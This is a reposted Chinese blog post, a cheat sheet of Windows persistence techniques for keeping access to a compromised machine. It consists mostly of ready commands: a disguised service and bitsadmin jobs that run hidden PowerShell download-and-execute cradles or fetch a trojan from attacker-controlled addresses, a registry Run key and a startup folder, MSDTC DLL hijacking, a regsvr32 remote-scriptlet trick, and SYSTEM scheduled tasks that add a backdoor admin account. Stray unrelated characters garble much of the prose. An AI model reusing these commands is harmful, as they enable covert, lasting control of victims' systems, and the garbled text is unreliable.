轉(zhuǎn)自--http://www.ansbase5.org/?p=366

服務(wù)啟動(dòng)

使用SC命令創(chuàng)建windows服務(wù)名最好偽裝下,binpath= 這里一定要注意有個(gè)空格,不然創(chuàng)建不成功,把powershell遠(yuǎn)程執(zhí)行下載命令也包含進(jìn)去地址：http://192.168.1.82:19001/a鏈接就是我們剛剛生成的木馬地址

sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX(((new-object net.webclient).downloadstring('http://192.168.1.82:19001/a'))\""

SC config "name" start= auto?//我們需要把這個(gè)name服務(wù)設(shè)置為自動(dòng)待诅。

Sc description "name" "description"?// 設(shè)置服務(wù)的描述字符串

net start "name"?// 啟動(dòng)服務(wù)

SC delete "name"?//刪除這個(gè)服務(wù)茫虽，不想使用服務(wù)直接刪除

PS:不是所有程序都可以作為服務(wù)的方式運(yùn)行,所以請(qǐng)看：http://www.x2009.net/articles/create-a-windows-service-methods.html

regedit 注冊(cè)表啟動(dòng)

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Users\Administrator\Desktop\artifact1.exe" /f//當(dāng)系統(tǒng)注銷(xiāo),再次進(jìn)入登入到目標(biāo)系統(tǒng)就會(huì)上線,權(quán)限是繼承的。

MSDTC

http://www.4hou.com/system/6890.html

簡(jiǎn)單說(shuō)：在域和工作組中谷醉，MSDTC服務(wù)啟動(dòng)時(shí)，會(huì)搜索注冊(cè)表Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI澡匪，MSDTC.exe啟動(dòng)時(shí)會(huì)加載3個(gè)dll(oci.dll,SQLLib80.dll,xa80.dll)，有一個(gè)dll不是系統(tǒng)自帶的减江，我們可以把我們的dll馬子替換成其中的那個(gè)不自帶的dll的名字(oci.dll)。

net start msdtc?// 手動(dòng)啟動(dòng) msdtc

降權(quán)啟動(dòng)MSDTC.exe ：msdtc -install

>PS: 滲透技巧——程序的降權(quán)啟動(dòng)?http://t.cn/RSp4h4O

啟動(dòng)項(xiàng)

C:\Users\{user}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Bitsadmin

該項(xiàng)的自啟動(dòng)是利用了schtasks來(lái)自啟動(dòng)的捻爷，必須要用戶(hù)登錄辈灼，且在登錄后2-4分鐘后才會(huì)執(zhí)行,此法貌似是有個(gè)90天的限制的？

需要權(quán)限：管理員

說(shuō)明：下方的start_test是任務(wù)名也榄，%comspec%是cmd的絕對(duì)路徑巡莹，%temp%是用戶(hù)的臨時(shí)目錄。

第一種：配合Powershell甜紫，測(cè)試成功

bitsadmin /create start_test //添加用戶(hù)名

bitsadmin /addfile start_test %comspec% %temp%\cmd.exe //添加文件降宅，此步驟是為下一步做鋪墊，

bitsadmin /SetNotifyCmdLine start_test "%COMSPEC%" "cmd.exe /c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.1:81/a'))\""? //第二步完成之后就啟動(dòng)這一步

bitsadmin /Resume start_test //啟動(dòng)下載任務(wù)

第二種：直接下載EXE執(zhí)行

bitsadmin /create start_test //創(chuàng)建任務(wù)

bitsadmin /addfile start_test http://www.baidu.com/muma.exe %temp%\muma.exe //添加文件囚霸，此步驟是為下一步做鋪墊腰根，

bitsadmin /SetNotifyCmdLine start_test "%COMSPEC%" "cmd.exe /c bitsadmin.exe /complete \"backdoor\" && start /B %temp%\muma.exe"? //第二步完成之后就啟動(dòng)這一步

bitsadmin /Resume start_test //啟動(dòng)下載任務(wù)

配合其他命令||我舉一，你反三

道理都是一樣的邮辽，你可以用regsvr32唠雕，也可以用其他的下載命令。

bitsadmin /create backdoor

bitsadmin /addfile backdoor %comspec%? %temp%\cmd.exe

bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"

bitsadmin /Resume backdoor

更加多的命令請(qǐng)看閱讀：windows命令執(zhí)行漏洞不會(huì)玩吨述？ 看我岩睁！：https://evi1cg.me/archives/remote_exec.html?||

下載文件的15種方法 - 愛(ài)小狐貍的小螃蟹：http://www.vuln.cn/6665?||

13種方式下載文件：https://evi1cg.me/archives/13-ways-to-download-a-file.html

更多關(guān)于Bitsadmin姿勢(shì)請(qǐng)閱讀：Use bitsadmin to maintain persistence and bypass Autoruns：https://www.tuicool.com/articles/rqe63qj||

使用計(jì)劃任務(wù)和bitsadmin實(shí)現(xiàn)惡意代碼長(zhǎng)期控守：http://blog.csdn.net/qq_31481187/article/details/57540231

SchTasks

>強(qiáng)大的任務(wù)計(jì)劃功能，你值得擁有的：官方網(wǎng)站文檔：https://technet.microsoft.com/zh-cn/library/cc772785.aspx#BKMK_days

Onstart:schtasks /create /tn sch /ru system /sc onstart /tr "net user admin admin /add"? /f

Onlogin:schtasks /create /tn sch /ru system /sc onlogin /tr "net user admin admin /add"? /f

Onidle:schtasks /create /tn sch /ru system /sc onidle /i 1 /tr "net user admin admin /add"? /f

every 1 min:schtasks /create /tn sch /ru system /sc MINUTE /mo 1? /tr "net user admin admin /add" /f

every 1 day:schtasks /create /tn sch /ru system /sc daily /mo 1? /tr "net user admin admin /add"? /f

onince:schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc once /sd 01/01/2003 /st 00:00? /f